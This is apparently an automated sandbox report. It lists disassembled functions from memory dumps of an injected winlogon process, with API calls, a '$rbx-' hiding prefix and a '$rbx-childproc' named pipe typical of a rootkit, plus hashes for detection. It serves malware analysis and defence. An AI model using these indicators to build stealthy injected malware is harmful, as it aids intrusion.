Instruction Fuzzy Hash: 09114C32658B8183E7108B22F55C35A7760F389BD4F94031AEA5A42AA9CF3CC184CF51

Function 000002E991782518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002E99178252D
GetCurrentProcessId.KERNEL32 ref: 000002E991782537
CreateFileW.KERNEL32 ref: 000002E991782568
WriteFile.KERNEL32 ref: 000002E991782590
ReadFile.KERNEL32 ref: 000002E9917825AF
CloseHandle.KERNEL32 ref: 000002E9917825B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000002E991782549

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 90b05e58fa747e168dea5d36b9fe3817fb4cea3a82530d062ea3a975dfc6d1ff
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 32115E32654B9183F710CB26F45835A7760F389BD5F94431AEA5A02BA9CF3CC199CF50

Function 000002E991727050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002E991727078
__scrt_acquire_startup_lock.LIBCMT ref: 000002E9917270CA
_RTC_Initialize.LIBCMT ref: 000002E9917270F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002E99172711E
__scrt_release_startup_lock.LIBCMT ref: 000002E991727149

Memory Dump Source

Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 42c5ddc62fc77b12195c3f3aa7af662906c00236da021469be3772891c23dbde
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 618118206822C366FB559B27EA4E35922D1BBA6780F57481F9D0547397DB38C9C78F30

Function 000002E991757C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002E991757C78
__scrt_acquire_startup_lock.LIBCMT ref: 000002E991757CCA
_RTC_Initialize.LIBCMT ref: 000002E991757CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002E991757D1E
__scrt_release_startup_lock.LIBCMT ref: 000002E991757D49

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: f755b599eafec87e59c1b07fc74af36fcb5151bd0050eeaac81e485eec3279b5
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: D381C1216803C396FB50AB67D84D36966D1BB85BC4F96411FAA0987797DB38C9C28F30

Function 000002E991787C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002E991787C78
__scrt_acquire_startup_lock.LIBCMT ref: 000002E991787CCA
_RTC_Initialize.LIBCMT ref: 000002E991787CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002E991787D1E
__scrt_release_startup_lock.LIBCMT ref: 000002E991787D49

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: cabc3fd86156c929d50b91b23d4def9da1412572f6ad8938f72a8133ca96ee76
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: FD81C5216802C396FB50DF67D4CD3696391BB85784F56419FA90A47397DB38C8C68F30

Function 000002E991759AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000002E991759C6B,?,?,?,000002E99175945C,?,?,?,?,000002E991758F65), ref: 000002E991759B31
GetLastError.KERNEL32(?,?,?,000002E991759C6B,?,?,?,000002E99175945C,?,?,?,?,000002E991758F65), ref: 000002E991759B3F
LoadLibraryExW.KERNEL32(?,?,?,000002E991759C6B,?,?,?,000002E99175945C,?,?,?,?,000002E991758F65), ref: 000002E991759B69
FreeLibrary.KERNEL32(?,?,?,000002E991759C6B,?,?,?,000002E99175945C,?,?,?,?,000002E991758F65), ref: 000002E991759BD7
GetProcAddress.KERNEL32(?,?,?,000002E991759C6B,?,?,?,000002E99175945C,?,?,?,?,000002E991758F65), ref: 000002E991759BE3

Strings

api-ms-, xrefs: 000002E991759B51

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 9b440b0885f9b3ad556a81275d224371b709ec613feb471ed359084364e2e270
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 3031B221352782D1FE529B17E8087A52394FB45BA0F9B062EED1D47792EF38C4C4CB20

Function 000002E991789AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000002E991789C6B,?,?,?,000002E99178945C,?,?,?,?,000002E991788F65), ref: 000002E991789B31
GetLastError.KERNEL32(?,?,?,000002E991789C6B,?,?,?,000002E99178945C,?,?,?,?,000002E991788F65), ref: 000002E991789B3F
LoadLibraryExW.KERNEL32(?,?,?,000002E991789C6B,?,?,?,000002E99178945C,?,?,?,?,000002E991788F65), ref: 000002E991789B69
FreeLibrary.KERNEL32(?,?,?,000002E991789C6B,?,?,?,000002E99178945C,?,?,?,?,000002E991788F65), ref: 000002E991789BD7
GetProcAddress.KERNEL32(?,?,?,000002E991789C6B,?,?,?,000002E99178945C,?,?,?,?,000002E991788F65), ref: 000002E991789BE3

Strings

api-ms-, xrefs: 000002E991789B51

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 6af6a93ee8eec3dc25594ae07b6be75bf9bfa43540248ea916cabbb8063bfeb8
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 1E31C5213526C191FE119B17D8887A52794BB84BA0F9B066FEE1D47796EF38C4C4CB20

Function 000002E991763400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002E991763431
GetLastError.KERNEL32 ref: 000002E99176343D
CloseHandle.KERNEL32 ref: 000002E991763455
CreateFileW.KERNEL32 ref: 000002E991763480
WriteConsoleW.KERNEL32 ref: 000002E99176349F

Strings

CONOUT$, xrefs: 000002E991763461

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 703b6713f1a341c0f0c07990f0257e272ea4544b404d549734add5d4a6cd9f33
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: F311BF31354B8186E7508B57E85C719A7A4F388FE4F42022AEA5EC7B95CF38C9848B61

Function 000002E991793400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002E991793431
GetLastError.KERNEL32 ref: 000002E99179343D
CloseHandle.KERNEL32 ref: 000002E991793455
CreateFileW.KERNEL32 ref: 000002E991793480
WriteConsoleW.KERNEL32 ref: 000002E99179349F

Strings

CONOUT$, xrefs: 000002E991793461

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 45f37a940c6f6ae4d728d83367e7b703058e4ea08d5f0a378ceb77f0f5652328
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 2111B231350B9182E7508B67E85871967A0F388FE5F42021AEA5E87BA5CF39C5988B50

Function 000002E991786270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002E9917862AB
GetThreadContext.KERNEL32 ref: 000002E991786415

Part of subcall function 000002E9917860A0: GetCurrentThreadId.KERNEL32 ref: 000002E9917860A4

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: fa228f4d49158893196ad5a10421384f173f9a835f4a2159c381d42f7cda90a8
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: B9D19D36244BC991EA70DB0AE49835A77A0F388B88F51055BEA8D4776ADF3DC591CF10

Function 000002E991752098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000002E9917520A6
TlsFree.KERNEL32 ref: 000002E99175225F
TlsFree.KERNEL32 ref: 000002E99175226B
TlsFree.KERNEL32 ref: 000002E991752277
TlsFree.KERNEL32 ref: 000002E991752283
TlsFree.KERNEL32 ref: 000002E99175228F

Part of subcall function 000002E991755E50: GetCurrentThreadId.KERNEL32 ref: 000002E991755E66

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 3534688ffde7270efffbe7f824817acf2eb317f5c95840e9515998278616db7a
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: C451E834281BC7D6EF05DB26E85829833A5FB08784F86481FA52D067A7EF74D598CB60

Function 000002E991782098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000002E9917820A6
TlsFree.KERNEL32 ref: 000002E99178225F
TlsFree.KERNEL32 ref: 000002E99178226B
TlsFree.KERNEL32 ref: 000002E991782277
TlsFree.KERNEL32 ref: 000002E991782283
TlsFree.KERNEL32 ref: 000002E99178228F

Part of subcall function 000002E991785E50: GetCurrentThreadId.KERNEL32 ref: 000002E991785E66

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 1e8877812eea2f52ff55e63e4975e2e56b8d3ccfe0ccb90a90a81bb723049eab
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: C3510734281BC795FB05DB2AECD829423A1FB08745F82485FA52D067A7EF38C598CB60

Function 000002E9917535C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000002E9917524D1), ref: 000002E9917535EB
HeapAlloc.KERNEL32(?,?,?,?,?,000002E9917524D1), ref: 000002E9917535FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000002E9917524D1), ref: 000002E991753673
GetProcessHeap.KERNEL32(?,?,?,?,?,000002E9917524D1), ref: 000002E9917536D9
HeapFree.KERNEL32(?,?,?,?,?,000002E9917524D1), ref: 000002E9917536E7

Strings

$rbx-, xrefs: 000002E99175366C

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 14af5fe45afac1de195f65a21a4c0ceb947a22538004007919bffdfdfc640091
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: A331AE22741BD687EA54DF17E94872963A0FB44BC4F0A402E8F4947B66EF38C4E18B30

Function 000002E9917835C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000002E9917824D1), ref: 000002E9917835EB
HeapAlloc.KERNEL32(?,?,?,?,?,000002E9917824D1), ref: 000002E9917835FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000002E9917824D1), ref: 000002E991783673
GetProcessHeap.KERNEL32(?,?,?,?,?,000002E9917824D1), ref: 000002E9917836D9
HeapFree.KERNEL32(?,?,?,?,?,000002E9917824D1), ref: 000002E9917836E7

Strings

$rbx-, xrefs: 000002E99178366C

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 58a081435fa869842f5ec09853ec55152717eb6fe42c14926e182d2e3a43f2a7
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: E3318221741B9286FA51DF1FE58876963A0FB54B88F0A402B8F4907B56EF34C4E58B20

Function 000002E99175C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002E99175C94F
SetLastError.KERNEL32 ref: 000002E99175C96E
FlsSetValue.KERNEL32 ref: 000002E99175C997
FlsSetValue.KERNEL32 ref: 000002E99175C9A8
FlsSetValue.KERNEL32 ref: 000002E99175C9B9

Part of subcall function 000002E99175D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002E99175674A), ref: 000002E99175D2B6
Part of subcall function 000002E99175D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002E99175674A), ref: 000002E99175D2C0

SetLastError.KERNEL32 ref: 000002E99175C9DC

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 461b37b39a04fa0aea62c8c5241b6e6ce36334fdceb55650c3323b4de1a3d23c
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 051173213942C342FA586733E81D36E1259BB857E0F56462FA866567C7DF38C4C18F21

Function 000002E99178C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002E99178C94F
SetLastError.KERNEL32 ref: 000002E99178C96E
FlsSetValue.KERNEL32 ref: 000002E99178C997
FlsSetValue.KERNEL32 ref: 000002E99178C9A8
FlsSetValue.KERNEL32 ref: 000002E99178C9B9

Part of subcall function 000002E99178D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002E99178674A), ref: 000002E99178D2B6
Part of subcall function 000002E99178D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002E99178674A), ref: 000002E99178D2C0

SetLastError.KERNEL32 ref: 000002E99178C9DC

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 6ee627d2b2e3662c7b0ec4e30c7bfb1ba790de5f1b6c59100786f73f84a0f73e
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 341173213C52D342FA146733E89D7AE1252BB847B0F5646AFA97A567C7DE38C4C14F20

Function 000002E991751A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002E991751A56
K32GetModuleFileNameExW.KERNEL32 ref: 000002E991751A74
PathFindFileNameW.SHLWAPI ref: 000002E991751A83
lstrlenW.KERNEL32 ref: 000002E991751A8F
StrCpyW.SHLWAPI ref: 000002E991751AA2
CloseHandle.KERNEL32 ref: 000002E991751AB0

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 1d8a4ed6992c39233f4a02bd144381189e5d46a7019aa5e5ce99f07443c05207
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: F5012D25744B8286EB14DB23E85C35963A1F788FC5F49403A9E9E83755DF3CC985CBA0

Function 000002E991781A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002E991781A56
K32GetModuleFileNameExW.KERNEL32 ref: 000002E991781A74
PathFindFileNameW.SHLWAPI ref: 000002E991781A83
lstrlenW.KERNEL32 ref: 000002E991781A8F
